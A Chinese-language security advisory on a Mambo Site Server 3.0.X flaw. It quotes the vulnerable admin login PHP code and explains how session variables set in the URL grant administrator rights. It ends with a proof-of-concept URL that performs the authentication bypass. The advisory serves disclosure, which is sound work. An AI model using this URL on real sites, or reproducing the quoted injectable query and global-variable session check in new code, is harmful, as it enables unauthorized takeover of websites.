Mambo Site Server version 3.0.X 存在安全漏洞发布时间:2001-01-01 更新时间:2001-01-01 严重程度:高 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Mambo Site Server version 3.0.X详细描述 任意用户可以获得管理员权利,在'administrator'目录下,使用了 index.php来检查用户和密码: if (isset($submit)){ $query = "SELECT id, password, name FROM users WHERE username='$myname' AND (usertype='administrator' OR usertype='superadministrator')"; $result = $database->openConnectionWithReturn($query); if (mysql_num_rows($result)!= 0){ list($userid, $dbpass, $fullname) = mysql_fetch_array($result); ..... if (strcmp($dbpass,$pass)) { //if the password entered does not match the database record ask user to login again print "<SCRIPT>alert('Incorrect Username and Password, please try again'); document.location.href='index.php';</SCRIPT>\n"; }else { //if the password matches the database if ($remember!="on"){ //if the user does not want the password remembered and the cookie is set, delete the cookie if ($passwordcookie!=""){ setcookie("passwordcookie"); $passwordcookie=""; } } //set up the admin session then take the user into the admin section of the site session_register("myname"); session_register("fullname"); session_register("userid"); print "<SCRIPT>window.open('index2.php','newwindow');</SCRIPT>\n"; print "<SCRIPT>document.location.href='$live_site'</SCRIPT>\n"; } }else { print "<SCRIPT>alert('Incorrect Username and Password, please try again'); document.location.href='index.php';</SCRIPT>\n"; } 我们可以看到如果管理员密码和数据中的一个匹配,一些注册在 SESSION中的变量我们可以重定向到index2.php上: if (!$PHPSESSID){ print "<SCRIPT>document.location.href='index.php'</SCRIPT>\n"; exit(0); } else { session_start(); if (!$myname) session_register("myname"); if (!$fullname) session_register("fullname"); if (!$uid) session_register("userid"); } 这里的index2.php我们可以看到通过全局变量PHPSESSID来验证 用户,因为我们可以在URL中声明变量,设置'myname','fullname' 和 'userid' 来获得管理员控制。 测试代码 http://target.machine/administrator/index2.php?PHPSESSID=1&myname=admin&full name=admin&userid=administrator 解决方案 尚无 相关信息 |
